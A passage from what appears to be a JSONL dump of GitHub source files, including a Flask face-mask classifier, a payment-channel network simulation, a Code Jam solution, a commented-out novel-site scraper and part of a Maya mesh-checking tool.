content['Key'],\n })\n \n s3_client.delete_objects(\n Bucket=bucket,\n Delete={\n 'Objects': remove_lst,\n 'Quiet': False\n }\n )\ndef lambda_handler(event, context):\n main()\n\n#lambda_handler('event', 'context')\n","repo_name":"anoyo-lin/aws_related","sub_path":"cdn/cdn_clear.py","file_name":"cdn_clear.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20458255905","text":"# =[Modules dan Packages]========================\n\nfrom flask import Flask,render_template,request,jsonify\nfrom werkzeug.utils import secure_filename\nimport pandas as pd\nimport numpy as np\nimport os\nfrom PIL import Image\nfrom io import BytesIO\nimport base64\nfrom fungsi import make_model\n\n# =[Variabel Global]=============================\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config['MAX_CONTENT_LENGTH'] = 2048 * 2048\napp.config['UPLOAD_EXTENSIONS'] = ['.jpg','.JPG', '.png', '.PNG', '.jpeg', '.JPEG']\napp.config['UPLOAD_PATH'] = './static/images/uploads/'\n\nmodel = None\n\nNUM_CLASSES = 3\nclassPred = ['incorrect_mask', 'with_mask', 'without_mask']\n\n# =[Routing]=====================================\n\n# [Routing untuk Halaman Utama atau Home]\n@app.route(\"/\")\ndef beranda():\n\treturn render_template('index.html')\n\n# [Routing untuk API]\t\n@app.route(\"/klasifikasi\", methods=['POST'])\ndef apiDeteksi():\n\thasil_prediksi = '(none)'\n\tgambar_prediksi = '(none)'\n\n\t# Get File\n\tuploaded_file = request.files['file']\n\tif uploaded_file == \"\":\n\t\trespon = jsonify({\n\t\t\t\"message\": \"Upload File\"\n\t\t})\n\t\trespon.status_code=400\n\t\treturn respon\n\tfilename = secure_filename(uploaded_file.filename)\n\t\n\t# Periksa\n\tif filename != '':\n\t\n\t\t# Set/mendapatkan extension dan path dari file yg diupload\n\t\tfile_ext = os.path.splitext(filename)[1]\n\t\tgambar_prediksi = '/static/images/uploads/' + filename\n\t\t\n\t\t# extension file sesuai (jpg)\n\t\tif file_ext in app.config['UPLOAD_EXTENSIONS']:\n\t\t\t\n\t\t\t# Simpan Gambar\n\t\t\tuploaded_file.save(os.path.join(app.config['UPLOAD_PATH'], filename))\n\t\t\t\n\t\t\t# Memuat Gambar\n\t\t\t# img = uploaded_file.read()\n\t\t\t# test_image = Image.open(BytesIO(base64.b64decode(img.split(',')[1])))\n\t\t\ttest_image = Image.open('.' 
+ gambar_prediksi)\n\t\t\t\n\t\t\t# Mengubah Ukuran Gambar\n\t\t\ttest_image_resized = test_image.resize((150, 150))\n\t\t\t\n\t\t\t# Konversi\n\t\t\timage_array = np.array(test_image_resized)\n\t\t\ttest_image_x = (image_array / 255) - 0.5\n\t\t\t# test_image_x = np.expand_dims(test_image_x, axis=0)\n\t\t\ttest_image_x = np.array([image_array])\n\t\t\t\n\t\t\t# Prediksi Gambar\n\t\t\ty_pred_test_single = model.predict_proba(test_image_x)\n\t\t\ty_pred_test_classes_single = np.argmax(y_pred_test_single, axis=1)\n\t\t\t\n\t\t\thasil_prediksi = classPred[y_pred_test_classes_single[0]]\n\t\t\t\n\t\t\t# Return JSON\n\t\t\trespon = jsonify({\n\t\t\t\t\"prediksi\": hasil_prediksi,\n\t\t\t\t\"gambar_prediksi\" : gambar_prediksi\n\t\t\t})\n\t\t\trespon.status_code=200\n\t\t\tprint(respon.json)\n\t\t\treturn respon\n\t\telse:\n\t\t\trespon = jsonify({\n\t\t\t\t'message': 'Error'\n\t\t\t})\n\t\t\trespon.status_code=400\n\t\t\treturn respon\n# =[Main]========================================\t\t\n\nif __name__ == '__main__':\t\n\t\n\t# Load model\n\tmodel = make_model()\n\tmodel.load_weights(\"no-tl-3.h5\")\n\n\t# Run Flask \n\tapp.run(host=\"localhost\", port=5000, debug=True)","repo_name":"mdhkrmd/face_mask_classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22435298364","text":"import math\nimport operator\nimport numpy as np\nfrom paymentmethod import (\n Payment_Network, sum_future_payments_to_counterparty, MULTIPLIER_CHANNEL_BALANCE,\n DUMMY_PAYMENT_VALUE\n)\nfrom network import Network_Elmo, Network_LVPC, Network_Donner\n\nMULTIPLIER_BALANCE_RECURSION_LVPC = 1.5\nAVAILABILITY_FACTOR = 4\n\nclass Custom_Elmo_LVPC_Donner(Payment_Network):\n def __init__(\n self, method_name, nr_players, opening_transaction_size,\n bitcoin_fee = 1000, bitcoin_delay = 3600,\n coins_for_parties = \"max_value\", base_fee = 1000, fee_rate = 0.0004,\n ):\n super().__init__(nr_players, bitcoin_fee, bitcoin_delay, coins_for_parties)\n self.method_name = method_name\n self.opening_transaction_size = opening_transaction_size\n self.open_channel_string = method_name + \"-open-channel\"\n self.open_virtual_channel_string = method_name + \"-open-virtual-channel\"\n self.pay_string = method_name + \"-pay\"\n if method_name == \"Elmo\":\n self.network = Network_Elmo(nr_players)\n elif method_name == \"LVPC\":\n self.network = Network_LVPC(nr_players)\n elif method_name == \"Donner\":\n self.network = Network_Donner(nr_players)\n else:\n raise ValueError\n\n self.base_fee = base_fee\n self.fee_rate = fee_rate\n # delay for opening new virtual channel (per hop)\n self.pay_delay = 1.5 * self.base_delay\n\n def get_distances_and_paths_from_source(self, source, future_payments):\n \"\"\"\n Returns weighted distances to the future parties and\n to parties not occuring in future payments.\n Muiltiple payments to same party give multiple distances.\n \"\"\"\n distances = []\n # weight if we are endpoint\n weight_endpoint = 100\n # weight if we are possible intermediary\n weight_intermediary = 10\n # weight for other parties\n weight_other = 1\n encountered_parties = set({source})\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE\n fee_intermediary = self.base_fee + dummy_lock_value * self.fee_rate\n cheapest_paths_from_sender = self.network.find_cheapest_paths_from_sender(\n source, dummy_lock_value, fee_intermediary\n )\n calculated_cheapest_paths = {}\n 
#near_parties = nx.single_source_shortest_path_length(self.network.graph, source, 5)\n path_data = []\n for future_sender, future_receiver, value in future_payments:\n encountered_parties.add(future_sender)\n encountered_parties.add(future_receiver)\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE + value\n # TODO:\n # I commented the part after the next if. And it made the simulation much much faster.\n # The bottleneck seems to be the find_cheapest_path method.\n # We precompute cheapest_paths_from_sender and use it where possible\n # if we also want to calculate the distances for the payments in which we are intermediaries\n # we either have to call find_cheapest_path every time or we have to precompute all shortest_paths\n # in the network which probably doesn't scale well. But I haven't yet tested how it scales.\n if future_sender != source: #and future_sender in near_parties:\n if (future_sender, source) not in calculated_cheapest_paths:\n cheapest_path = self.network.find_cheapest_path(\n future_sender, source, dummy_lock_value,\n self.base_fee + dummy_lock_value * self.fee_rate\n )\n calculated_cheapest_paths[(future_sender, source)] = cheapest_path\n else:\n cheapest_path = calculated_cheapest_paths[(future_sender, source)]\n path_data.append((\n weight_endpoint if future_receiver == source else weight_intermediary,\n cheapest_path\n ))\n if future_receiver != source:\n path_data.append((\n weight_endpoint if future_sender == source else weight_intermediary,\n cheapest_paths_from_sender.get(future_receiver)\n ))\n\n dummy_lock_value = MULTIPLIER_CHANNEL_BALANCE * DUMMY_PAYMENT_VALUE\n for party in (set(self.network.graph.nodes()).difference(encountered_parties)):\n path_data.append((\n weight_other,\n cheapest_paths_from_sender.get(party)\n ))\n\n for weight, cheapest_path in path_data:\n if cheapest_path is None:\n distances.append((weight, math.inf))\n else:\n distances.append((weight, len(cheapest_path)-1))\n\n return distances, cheapest_paths_from_sender\n\n # review: after all, the `new_virtual_channel_delay` parameter is useless, because the situation is more complicated:\n # Donner: (hops+1)*BASE_DELAY\n # Elmo: (12*hops-12)*BASE_DELAY\n # LVPC: (8*hops-7)*BASE_DELAY\n def get_new_virtual_channel_time(self, hops):\n if self.method_name == \"LVPC\":\n return (8 * hops - 7) * self.base_delay\n elif self.method_name == \"Elmo\":\n return (12 * hops - 12) * self.base_delay\n else:\n return (hops + 1) * self.base_delay\n\n def get_new_virtual_channel_fee(self, path, coins_to_lock):\n \"\"\"\n Returns the correct values for Elmo and Donner.\n And the correct values for LVPC for path of length 3.\n Fees for longer paths in LVPC are calculated recursively using this function.\n \"\"\"\n return (self.base_fee + coins_to_lock * self.fee_rate) * (len(path) - 2)\n\n def get_new_channel_option(self, sender, receiver, value, knowledge_sender):\n # in case we have already a channel\n if self.network.graph.get_edge_data(sender, receiver) is not None:\n return None\n future_payments, _, _ = knowledge_sender\n new_channel_time = self.plain_bitcoin.get_delay() + self.pay_delay\n new_channel_fee = self.plain_bitcoin.get_fee(self.opening_transaction_size)\n sum_future_payments = sum_future_payments_to_counterparty(\n sender, receiver, future_payments\n )\n sender_coins = min(\n self.plain_bitcoin.coins[sender] - value - new_channel_fee,\n (\n sum_future_payments + MULTIPLIER_CHANNEL_BALANCE * value\n )\n )\n if sender_coins < 0:\n return None\n 
self.network.add_channel(sender, sender_coins, receiver, value, None)\n new_channel_distance, cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n new_channel_centrality = self.network.get_centrality(sender, cheapest_paths_from_sender)\n self.network.close_channel(sender, receiver)\n return {\n 'delay': new_channel_time,\n 'fee': new_channel_fee,\n 'centrality': new_channel_centrality,\n 'distance': new_channel_distance,\n 'payment_information': {\n 'kind': self.open_channel_string,\n 'data': (sender, receiver, value, sender_coins)\n }\n }\n\n def determine_sender_coins(self, value, path, desired_sender_coins, available_balances):\n \"\"\"\n This method enables the sender to determine the amount of coins to put on a\n new virtual channel.\n \"\"\"\n fee_for_value = self.get_new_virtual_channel_fee(path, value)\n # here we calculate how much balance remains after transferring value and a part of\n # the fee to the next intermediary\n # (this gives a lower bound on the remaining balances as fee_for_value is an upper bound\n # on how much of the fee has to be transferred to the next intermediary)\n # available_balances should be a np.array.\n remaining_balances = available_balances - value - fee_for_value\n # now we use the remaining balances to determine how much the sender can possibly put\n # on new virtual channel\n smallest_remaining_balance = min(remaining_balances)\n # we want to put exactly (if desired coins are more than remaining balance) \n # so much on the new channel such that \n # sender_coins + fee_sender_coins = smallest_remaining_balance\n # where fee_sender_coins = fee_rate * sender_coins * (len(path) - 2)\n sender_coins = min(\n desired_sender_coins,\n smallest_remaining_balance / (1 + self.fee_rate * (len(path) - 2))\n )\n return sender_coins\n\n def get_new_virtual_channel_option(self, sender, receiver, value, knowledge_sender):\n # in case we have already a channel\n if self.network.graph.get_edge_data(sender, receiver) is not None:\n return None\n future_payments, _, _ = knowledge_sender\n sum_future_payments = sum_future_payments_to_counterparty(\n sender, receiver, future_payments\n )\n # this is a simplification to calculate cheapest paths\n anticipated_lock_value = sum_future_payments + value\n if self.method_name == \"Elmo\" or self.method_name == \"LVPC\":\n cost_and_path = self.network.find_cheapest_path(\n sender, receiver, anticipated_lock_value, self.base_fee\n )\n elif self.method_name == \"Donner\":\n cost_and_path = self.network.find_cheapest_path(\n sender, receiver, anticipated_lock_value, self.base_fee,\n function=\"new_virtual_donner\"\n )\n else:\n raise ValueError\n\n if cost_and_path is None:\n return None\n hops, path = cost_and_path\n # the AVAILABILITY_FACTOR is used so that lower channel doesn't end up with 0 balance.\n available_balances = np.array([\n self.network.graph[path[i]][path[i+1]]['balance'] /\n AVAILABILITY_FACTOR for i in range(len(path)-1)\n ])\n desired_virtual_coins = sum_future_payments + MULTIPLIER_CHANNEL_BALANCE * value\n sender_coins = self.determine_sender_coins(\n value, path, desired_virtual_coins, available_balances\n )\n if sender_coins < 0:\n return None\n payment_information = {\n 'kind': self.open_virtual_channel_string, 'data': (path, value, sender_coins)\n }\n try:\n new_virtual_channel_fee = self.do(payment_information)\n except ValueError:\n return None\n new_virtual_channel_time = self.get_new_virtual_channel_time(hops)\n new_virtual_channel_distance, 
cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n new_virtual_channel_centrality = self.network.get_centrality(\n sender, cheapest_paths_from_sender\n )\n self.undo(payment_information)\n return {\n 'delay': new_virtual_channel_time,\n 'fee': new_virtual_channel_fee,\n 'centrality': new_virtual_channel_centrality,\n 'distance': new_virtual_channel_distance,\n 'payment_information': payment_information\n }\n\n def get_pay_option(self, sender, receiver, value, knowledge_sender):\n future_payments, num_payments_sender, num_total_payments = knowledge_sender\n payment_information = {'kind': self.pay_string, 'data': (sender, receiver, value)}\n try:\n self.do(payment_information)\n except ValueError:\n return None\n distance_pay, cheapest_paths_from_sender = (\n self.get_distances_and_paths_from_source(sender, future_payments)\n )\n centrality_pay = self.network.get_centrality(sender, cheapest_paths_from_sender)\n self.undo(payment_information)\n return {\n 'delay': self.pay_delay,\n 'fee': 0,\n 'centrality': centrality_pay,\n 'distance': distance_pay,\n 'payment_information': payment_information\n }\n\n def get_payment_options(self, sender, receiver, value, knowledge_sender):\n onchain_option = self.get_onchain_option(sender, receiver, value, knowledge_sender)\n new_channel_option = self.get_new_channel_option(sender, receiver, value, knowledge_sender)\n new_virtual_channel_option = self.get_new_virtual_channel_option(\n sender, receiver, value, knowledge_sender\n )\n pay_option = self.get_pay_option(sender, receiver, value, knowledge_sender)\n options = [onchain_option, new_channel_option, new_virtual_channel_option, pay_option]\n return [option for option in options if option is not None]\n\n def update_balances_new_virtual_channel(self, path, value, sender_coins, new_channel = False):\n # the new_channel argument tells whether this corresponds to making a payment\n # or undoing it.\n # all the descriptive names like \"op_take\", \"received\", etc are in the case of a payment\n # in case of undoing they do the opposite.\n op_take, op_give = (\n (operator.add, operator.sub) if new_channel else (operator.sub, operator.add)\n )\n num_intermediaries = len(path) - 2\n sender = path[0]\n fee_intermediary = self.base_fee + self.fee_rate * (value + sender_coins)\n cost_sender = num_intermediaries * fee_intermediary\n if cost_sender > self.network.graph[sender][path[1]]['balance'] and new_channel == True:\n raise ValueError\n # update the balances of the intermediaries.\n for i in range(1, num_intermediaries + 1):\n received = (num_intermediaries - (i-1)) * fee_intermediary\n transfered = received - fee_intermediary\n new_taker_balance = op_take(\n self.network.graph[path[i]][path[i-1]]['balance'], received\n )\n new_giver_balance = op_give(\n self.network.graph[path[i]][path[i+1]]['balance'], transfered\n )\n # we test just for new_giver_balance < 0 as in case of new virtual channel\n # only giver_balance gets smaller.\n # In case of undoing it, there was a payment done before,\n # so there shouldn't occur numbers < 0.\n if new_giver_balance < 0:\n for j in range(1, i):\n received = (num_intermediaries - (j-1)) * fee_intermediary\n transfered = received - fee_intermediary\n new_taker_balance = op_give(\n self.network.graph[path[j]][path[j-1]]['balance'], received\n )\n new_giver_balance = op_take(\n self.network.graph[path[j]][path[j+1]]['balance'], transfered\n )\n raise ValueError\n self.network.graph[path[i]][path[i-1]]['balance'] = 
new_taker_balance\n self.network.graph[path[i]][path[i+1]]['balance'] = new_giver_balance\n self.network.graph[sender][path[1]]['balance'] = op_give(\n self.network.graph[sender][path[1]]['balance'], cost_sender\n )\n\n\n def pay(self, sender, receiver, value):\n if self.network.graph.get_edge_data(sender, receiver) is None:\n raise ValueError\n elif self.network.graph[sender][receiver]['balance'] < value:\n raise ValueError\n self.network.graph[sender][receiver]['balance'] -= value\n self.network.graph[receiver][sender]['balance'] += value\n\n def do(self, payment_information):\n if payment_information['kind'] == 'onchain':\n self.plain_bitcoin.pay(payment_information['data'])\n elif payment_information['kind'] == self.open_channel_string:\n sender, receiver, value, sender_coins = payment_information['data']\n self.network.add_channel(sender, sender_coins, receiver, value, None)\n # next update the coins of sender\n amount_sender = - (\n sender_coins + value +\n self.plain_bitcoin.get_fee(self.opening_transaction_size)\n )\n self.plain_bitcoin.update_coins(sender, amount_sender)\n elif payment_information['kind'] == self.open_virtual_channel_string:\n path, value, sender_coins = payment_information['data']\n sender = path[0]\n if self.open_virtual_channel_string == \"LVPC-open-virtual-channel\":\n new_virtual_channel_fee = 0\n for i in range(len(path)-2):\n path_for_recursion = [sender] + path[i+1:i+3]\n sender_coins_recursion = sender_coins / (MULTIPLIER_BALANCE_RECURSION_LVPC**i)\n if i != len(path)-3:\n sender_coins_recursion += value * (1 + self.fee_rate) + self.base_fee\n receiver_coins_recursion = (\n 0 if i != len(path)-3 else value\n )\n receiver_recursion = path_for_recursion[-1]\n new_virtual_channel_fee += self.get_new_virtual_channel_fee(\n path_for_recursion, sender_coins_recursion + receiver_coins_recursion\n )\n # important that next line is at that position\n # so that Error gets raised in case update is not possible\n # before anything else is done.\n self.update_balances_new_virtual_channel(\n path_for_recursion, receiver_coins_recursion,\n sender_coins_recursion, new_channel=True\n )\n self.network.lock_unlock(\n path_for_recursion, sender_coins_recursion + receiver_coins_recursion,\n lock=True\n )\n self.network.add_channel(\n sender, sender_coins_recursion, receiver_recursion,\n receiver_coins_recursion, path_for_recursion\n )\n return new_virtual_channel_fee\n else: # Donner or Elmo\n sender = path[0]\n receiver = path[-1]\n # important that next line is at that position\n # so that Error gets raised in case update is not possible\n # before anything else is done.\n self.update_balances_new_virtual_channel(\n path, value, sender_coins, new_channel=True\n )\n self.network.lock_unlock(path, sender_coins + value, lock=True)\n self.network.add_channel(sender, sender_coins, receiver, value, path)\n new_virtual_channel_fee = self.get_new_virtual_channel_fee(\n path, value + sender_coins\n )\n return new_virtual_channel_fee\n elif payment_information['kind'] == self.pay_string:\n sender, receiver, value = payment_information['data']\n self.pay(sender, receiver, value)\n else:\n raise ValueError\n\n def undo(self, payment_information):\n if payment_information['kind'] == self.open_virtual_channel_string:\n path, value, sender_coins = payment_information['data']\n sender = path[0]\n if self.open_virtual_channel_string == \"LVPC-open-virtual-channel\":\n for i in range(len(path)-3, -1, -1):\n path_for_recursion = [sender] + path[i+1:i+3]\n receiver = path_for_recursion[-1]\n 
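                    # Sketch of the closed form used by determine_sender_coins above:
                    # requiring
                    #     sender_coins + fee_rate * sender_coins * (len(path) - 2) <= smallest_remaining_balance
                    # with equality at the cap gives
                    #     sender_coins = smallest_remaining_balance / (1 + fee_rate * (len(path) - 2)).
                    # Quick numeric check with made-up values:
                    #
                    #     fee_rate, path_len = 0.01, 5          # sender, 3 intermediaries, receiver
                    #     smallest_remaining_balance = 103.0
                    #     sender_coins = smallest_remaining_balance / (1 + fee_rate * (path_len - 2))
                    #     fee = fee_rate * sender_coins * (path_len - 2)
                    #     assert abs(sender_coins + fee - 103.0) < 1e-9   # 100.0 + 3.0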
amount_sender, amount_receiver = self.network.cooperative_close_channel(\n sender, receiver\n )\n self.update_balances_new_virtual_channel(\n path_for_recursion, amount_receiver, amount_sender, new_channel=False\n )\n else:\n sender = path[0]\n receiver = path[-1]\n amount_sender, amount_receiver = self.network.cooperative_close_channel(\n sender, receiver\n )\n self.update_balances_new_virtual_channel(\n path, amount_receiver, amount_sender, new_channel=False\n )\n elif payment_information['kind'] == self.pay_string:\n sender, receiver, value = payment_information['data']\n if self.network.graph.get_edge_data(sender, receiver) is None:\n raise ValueError\n self.network.graph[sender][receiver]['balance'] += value\n self.network.graph[receiver][sender]['balance'] -= value\n else:\n raise ValueError\n","repo_name":"OrfeasLitos/virtual-payment-channels","sub_path":"simulation/custom_elmo_lvpc_donner.py","file_name":"custom_elmo_lvpc_donner.py","file_ext":"py","file_size_in_byte":20828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23427386501","text":"import sys\r\n\r\ndef dps(C,F,X):\r\n f0=0\r\n f0=2;\r\n if X<=C: return str(X/f0)\r\n t=0;\r\n t0=0;\r\n t+=C/f0;\r\n while f0<=(X/C-1)*F:\r\n f0+=F\r\n t+=C/f0 \r\n t+=(X-C)/f0\r\n return str(t)\r\n\r\nwith open('a.in','r') as f:\r\n\tdata=f.readlines()\r\n\r\nN=int(data[0]);\r\nres=\"\";\r\n\r\n\r\nfor i in range(N):\r\n [C,F,X]=[float(_) for _ in data[1+i].split()]\r\n res+=\"Case #\"+str(i+1)+\": \"+dps(C,F,X)+\"\\n\"\r\n\r\nwith open('b.txt', 'w') as f:\r\n\tf.write(res)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/3273.py","file_name":"3273.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6364347852","text":"# import scrapy\n# from scrapy.spiders import CrawlSpider, Rule\n# from scrapy.linkextractor import LinkExtractor\n# from xsspider.items import BookItem, ChaptersItem\n# import re\n#\n#\n# class NovelSpider(CrawlSpider):\n# name = '23us_spider'\n# allowed_domains=[\"23us.so\"]\n# start_urls = ['http://www.23us.so/xiaoshuo/13694.html']\n# rules = (\n# #http://www.23us.so/xiaoshuo/13694.html 小说页面\n# Rule(LinkExtractor(allow=(\"xiaoshuo/\\d*\\.html\")), callback=\"parse_book_info\", follow=True),\n# #http://www.23us.so/files/article/html/13/13694/index.html #小说所有章节列表\n# Rule(LinkExtractor(allow=(\"files/article/html/\\d*?/\\d*?/index.html\")),callback=\"get_chapters\", follow=True),\n# #http://www.23us.so/files/article/html/13/13694/6167429.html#每一章内容\n# Rule(LinkExtractor(allow=(\"files/article/html/\\d*?/\\d*?/\\d*?.html\")),callback=\"parse_chapter_content\", follow=True),\n# Rule(LinkExtractor(allow=(\".*?\")), follow=True)\n# )\n#\n# def parse_book_info(self, response):\n# if not response.body:\n# print(response.url + \"is already crawled\")\n# return\n# novel_Url = response.url\n# novel_Name = response.xpath(\"//dl[@id='content']//h1/text()\").extract_first().split(\" \")[0]\n# novel_ImageUrl = response.xpath(\"//a[@class='hst']/img/@src\").extract_first()\n# novel_ID = int(response.url.split(\"/\")[-1].split(\".\")[0])\n# novel_Type = response.xpath(\".//table[@id='at']/tr[1]/td[1]/a/text()\").extract_first()\n# novel_Author = response.xpath(\".//table[@id='at']/tr[1]/td[2]/text()\").extract_first().strip()\n# novel_Status = response.xpath(\".//table[@id='at']/tr[1]/td[3]/text()\").extract_first().strip()\n# 
novel_Collect = response.xpath(\".//table[@id='at']/tr[2]/td[1]/text()\").extract_first().strip()\n# novel_Words = response.xpath(\".//table[@id='at']/tr[2]/td[2]/text()\").extract_first().strip()\n# novel_UpdateTime = response.xpath(\".//table[@id='at']/tr[2]/td[3]/text()\").extract_first().strip()\n# novel_Allclick = response.xpath(\".//table[@id='at']/tr[3]/td[1]/text()\").extract_first().strip()\n# novel_Monclick = response.xpath(\".//table[@id='at']/tr[3]/td[2]/text()\").extract_first().strip()\n# novel_Weekclick = response.xpath(\".//table[@id='at']/tr[3]/td[3]/text()\").extract_first().strip()\n# novel_Allcomm = response.xpath(\".//table[@id='at']/tr[4]/td[1]/text()\").extract_first().strip()\n# novel_Moncomm = response.xpath(\".//table[@id='at']/tr[4]/td[2]/text()\").extract_first().strip()\n# novel_Weekcomm = response.xpath(\".//table[@id='at']/tr[4]/td[3]/text()\").extract_first().strip()\n# pattern = re.compile(r'
(.*?)\r\n\r\nThis program is free software: you can redistribute it and/or modify it under \r\nthe terms of the GNU General Public License as published by the Free Software \r\nFoundation, either version 3 of the License, or (at your option) any later \r\nversion.\r\n\r\nThis program is distributed in the hope that it will be useful, but WITHOUT ANY \r\nWARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A \r\nPARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n\r\nYou should have received a copy of the GNU General Public License along with \r\nthis program. If not, see .\r\n\"\"\"\r\n\r\nimport maya.api.OpenMaya as om # Maya Python API 2.0\r\nimport maya.cmds as cmds\r\nimport sys\r\nfrom tlc.common.conditionchecker import ConditionChecker\r\nfrom tlc.common.conditionchecker import ConditionErrorLevel\r\nfrom tlc.common.conditionchecker import ConditionErrorCriteria\r\n\r\ndef getTileID(u, v):\r\n \"\"\"Build tile ID string for a texture coordinates pair (u,v)\r\n\r\n Args:\r\n u (float): Tile U\r\n v (float): Tile V\r\n\r\n Returns:\r\n str: Tile ID\r\n \"\"\"\r\n tu = int(u)\r\n tv = int(v)\r\n return \"%d,%d\"%(tu, tv) \r\n\r\n\r\ndef checkUVTile(u, v, the_set):\r\n \"\"\"Check the UV tile for a pair of texture coordinates (u,v) and add it to the set of checked tiles\r\n\r\n Args:\r\n u (float): Tile U\r\n v (float): Tile V\r\n the_set (set): Set of so-far checked tiles\r\n \"\"\"\r\n tile_id = getTileID(u, v)\r\n the_set.add(tile_id)\r\n\r\n\r\nclass MeshChecker():\r\n \"\"\"Class MeshChecker\r\n\r\n Statistics of a mesh\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"Constructor\r\n \"\"\"\r\n\r\n self.selection = []\r\n \"\"\"Original selection to be analized\r\n \"\"\"\r\n\r\n self.bbox = [ sys.float_info.max, sys.float_info.max, sys.float_info.max, -sys.float_info.max, -sys.float_info.max, -sys.float_info.max ]\r\n \"\"\"Global world-space bounding box for the selection [xmin, ymin, zmin, xmax, ymax, zmax]\r\n \"\"\"\r\n\r\n self.geoConditions = dict()\r\n \"\"\"Dictionary/map of geometry condition checkers (using name as key)\r\n \"\"\"\r\n\r\n self.uvConditions = dict()\r\n \"\"\"Dictionary/map of UV condition checkers (using name as key)\r\n \"\"\"\r\n\r\n self.geoConditions[\"meshes\"] = ConditionChecker(\"meshes\", \"Meshes\", \"Number of meshes in selected elements\", False)\r\n #self.addGeoCondition(\"history\")\r\n\r\n # Poly evaluate\r\n self.geoConditions[\"shells\"] = ConditionChecker(\"shells\", \"Shells\", \"Number of shells in selected elements\", False)\r\n self.geoConditions[\"vertices\"] = ConditionChecker(\"vertices\", \"Vertices\", \"Number of vertices in selected elements\", False)\r\n self.geoConditions[\"edges\"] = ConditionChecker(\"edges\", \"Edges\", \"Number of edges in selected elements\", False)\r\n self.geoConditions[\"faces\"] = ConditionChecker(\"faces\", \"Faces\", \"Number of faces/polygons in selected elements\", False)\r\n self.geoConditions[\"area\"] = ConditionChecker(\"area\")\r\n\r\n # Face checks\r\n self.geoConditions[\"quads\"] = ConditionChecker(\"quads\", \"Quads\", \"Number of quads in selected elements\")\r\n self.geoConditions[\"tris\"] = ConditionChecker(\"tris\", \"Tris\", \"Number of triangles in selected elements\")\r\n self.geoConditions[\"ngons\"] = ConditionChecker(\"ngons\", \"n-Gons\", \"Number of n-gons in selected elements\")\r\n # Degenerated faces (only quads)\r\n self.geoConditions[\"quadsToTris\"] = ConditionChecker(\"quadsToTris\", \"Quads to tris\", \"Number of quads 
degenerated to triangles (two vertices in the same position)\") # Two vertices in the same position\r\n self.geoConditions[\"quadsToLines\"] = ConditionChecker(\"quadsToLines\", \"Quads to lines\", \"Number of quads degenerated to lines (vertices in two different positions)\") # 2+2 or 3+1 vertices grouped\r\n self.geoConditions[\"quadsToPoints\"] = ConditionChecker(\"quadsToPoints\", \"Quads to points\", \"Number of quads degenerated to points (all vertices in the same position)\") # All four vertices in the same position\r\n self.geoConditions[\"zeroAreaQuads\"] = ConditionChecker(\"zeroAreaQuads\", \"Zero area quads\", \"Zero area quads\") # More than two vertices in the same position\r\n \r\n # Edge checks\r\n self.geoConditions[\"borderEdges\"] = ConditionChecker(\"borderEdges\", \"Border edges\", \"Number of border edges in selected elements\") # Border edges (only one face uses this edge)\r\n self.geoConditions[\"evilEdges\"] = ConditionChecker(\"evilEdges\", \"Evil edges\", \"Number of edges sharing more than two faces. Non-manifold geometry\") # Edges connecting more than 2 faces\r\n \r\n # Vertex checks\r\n self.geoConditions[\"poles\"] = ConditionChecker(\"poles\", \"Poles\", \"Number of poles in selected elements (vertices connecting a number of edges other than 4)\")\r\n\r\n # UVs\r\n self.uvConditions[\"uvSets\"] = ConditionChecker(\"uvSets\", \"UV sets\", \"Number of UV sets in selected elements\", False) # Number of UV sets\r\n self.uvConditions[\"uvShells\"] = ConditionChecker(\"uvShells\", \"UV shells\", \"Number of UV shells in selected elements\", False) # Number of UV shells\r\n self.uvConditions[\"uvMissing\"] = ConditionChecker(\"uvMissing\", \"UV missing\", \"Number of face vertices missing UV coordinates\") # Faces with no UVs\r\n self.uvConditions[\"uvFlipped\"] = ConditionChecker(\"uvFlipped\", \"UV flipped\", \"Number of faces flipped in UV space\") # Faces flipped in UV\r\n self.uvConditions[\"uvZeroArea\"] = ConditionChecker(\"uvZeroArea\", \"UV zero area\", \"Number of faces occupying zero (or near zero) area in UV space\") # Faces with zero area in UV space\r\n self.uvConditions[\"uvOverlapping\"] = ConditionChecker(\"uvOverlapping\", \"UV overlaps\", \"Number of faces overlapped in UV space\") # Overlapping faces\r\n self.uvConditions[\"uvCrossingBorders\"] = ConditionChecker(\"uvCrossingBorders\", \"UV crossing borders\", \"Number of faces crossing borders of a tile\") # Faces crossing tile (UDIM) borders\r\n self.uvConditions[\"uvCoverage\"] = ConditionChecker(\"uvCoverage\", \"UV coverage\", \"Normalized UV coverage of selected elements\", False) # UV coverage (normalized to the space of tiles/UDIMs used)\r\n # Normalized Texeld Density (NTD)\r\n self.uvConditions[\"avgNTD\"] = ConditionChecker(\"avgNTD\", \"Avg. NTD\", \"Average normalized texel density\", False) # Average NTD\r\n self.uvConditions[\"minNTD\"] = ConditionChecker(\"minNTD\", \"Min. NTD\", \"Minimum normalized texel density\", False) # Minimum NTD\r\n self.uvConditions[\"maxNTD\"] = ConditionChecker(\"maxNTD\", \"Max. NTD\", \"Maximum normalized texel density\", False) # Maximum NTD\r\n self.uvConditions[\"varianceNTD\"] = ConditionChecker(\"varianceNTD\", \"Var. NTD\", \"Variance normalized texel density\", False) # Variance of NTD distribution\r\n self.uvConditions[\"stdDevNTD\"] = ConditionChecker(\"stdDevNTD\", \"Stdev. 
